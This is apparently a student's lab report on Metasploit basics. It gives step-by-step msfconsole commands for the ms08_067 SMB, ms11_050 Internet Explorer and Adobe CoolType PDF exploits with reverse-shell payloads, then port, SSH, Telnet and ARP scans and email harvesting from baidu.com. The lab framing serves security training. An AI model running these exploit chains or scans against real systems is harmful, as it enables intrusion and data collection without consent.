20155333 "Network Confrontation" Exp5 MSF Basic Application
basic question answer
Explain what is exploit, payload, encode in your own words
- exploit: means of attack, which is a method of attacking a weapon (payload);
- Payload: Attack weapon, really offensive code;
- encode: encoding method, select the appropriate encoding method according to the environment where the payload will be placed, so that it can run normally.
practice
An active attack practice such as ms08_067
①Attack aircraft: kali ②Target aircraft: Windows XP SP3(English)
Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use exploit/windows/smb/ms08_067_netapi
//Using the ms08_067 vulnerability, after use is actually the path name of the directory where the vulnerability is located
msf exploit(ms08_067_netapi) > show payloads
//Display the link back attack payload
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
//tcp reverse connection
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.146
//attack machine ip
msf exploit(ms08_067_netapi) > set LPORT 5333
//attack port
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.18
//The target machine ip, the specific vulnerability port has been fixed
msf exploit(ms08_067_netapi) > set target 0
//Automatically select the target system type, with a high degree of matching
msf exploit(ms08_067_netapi) > exploit
//attack
A session is established, and the successful attack results are as follows:
A browser-targeted attack such as ms11_050
①Attack aircraft: kali ②Target aircraft: WindowsXP Professional sp2/Windows7 Professional Edition ③IE version: 7.0/8.0
Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
//Use the browser ms11_050 vulnerability
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http
//http reverse link
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.146
//attack machine ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5333
//fixed attack port
msf exploit(ms11_050_cobjectelement) > set URIPATH 5333rh123
//Uniform resource identifier path setting
msf exploit(ms11_050_cobjectelement) > exploit
Enter http://192.168.43.146:8080/5333rh123 in the browser, IE pops up the data execution protection pop-up window and the warning pop-up window. If you encounter problems, you need to close the program:
After modifying the security settings of the Internet, it still fails!
A client-side attack such as Adobe
①Attack aircraft: kali ②Target aircraft: windowsXP Professional sp2 ③Adobe version: 9.3
Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
//tcp reverse connection
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.199.170
//attack machine ip
msf exploit(adobe_cooltype_sing) > set LPORT 5333
//attack port
msf exploit(adobe_cooltype_sing) > set FILENAME 20155333.pdf
//Set the name of the generated pdf file
msf exploit(adobe_cooltype_sing) > exploit
//attack
20155333.pdf was successfully generated:
After transferring or copying the pdf file to the target machine, enter back on kali to exit the current module, enter the monitoring module, and enter the following command:
msf > use exploit/multi/handler
// enter the monitor module
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp reverse connection
msf exploit(handler) > set LHOST 192.168.199.170
//attack machine ip
msf exploit(handler) > set LPORT 5333
//fixed attack port
msf exploit(handler) > exploit
Then open the 20155333.pdf file on the target drone
The connection failed, presumably because I downloaded Abode Reader XI, which has no loopholes.
Successfully applied any of the auxiliary modules
You can use the command to msf > show auxiliary
view all auxiliary modules:
1. Scan port
msf > use auxiliary/scanner/portscan/syn
//Use portscan module
msf auxiliary(syn) > show options
msf auxiliary(syn) > set RHOSTS 192.168.199.140
//Target
msf auxiliary(syn) > set THREADS 50
//thread
msf auxiliary(syn) > exploit
2. ssh server scan
msf > use auxiliary/scanner/ssh/ssh_version
// use the ssh_version module
msf auxiliary(ssh_version) > show options
// view options
msf auxiliary(ssh_version) > set RHOSTS 10.107.100.0/24
//target network segment
msf auxiliary(ssh_version) > set THREADS 50
//thread
msf auxiliary(ssh_version) > exploit
3. Telnet server scan
msf > use auxiliary/scanner/telnet/telnet_version
//Use the telnet_version module
msf auxiliary(telnet_version) > show options
// view options
msf auxiliary(telnet_version) > set RHOSTS 10.180.100.0/24
//target network segment
msf auxiliary(telnet_version) > set THREADS 50
//thread
msf auxiliary(telnet_version) > exploit
4. Search for Email Addresses in Websites
msf > use auxiliary/gather/search_email_collector
//Use the search_email_collector module
msf auxiliary(search_email_collector) > show options
// view options
msf auxiliary(search_email_collector) > set DOMAIN baidu.com
//scan target
msf auxiliary(search_email_collector) > exploit
5. Scan how many hosts are alive on the LAN
msf > use auxiliary/scanner/discovery/arp_sweep
//Use the discovery/arp_sweep module
msf auxiliary(arp_sweep) > show options
// view options
msf auxiliary(arp_sweep) > set RHOSTS 10.180.100.0/24
//target network segment
msf auxiliary(arp_sweep) > set THREADS 50
//thread
msf auxiliary(arp_sweep) > exploit
Attempt to exploit ms11_006_createsizeddibsection vulnerability
Experiment summary and experience
The process of this experiment can be said to be very difficult. Even after referring to the blogs of the seniors and other students, I still failed to complete all the practice successfully. I hope it can be improved.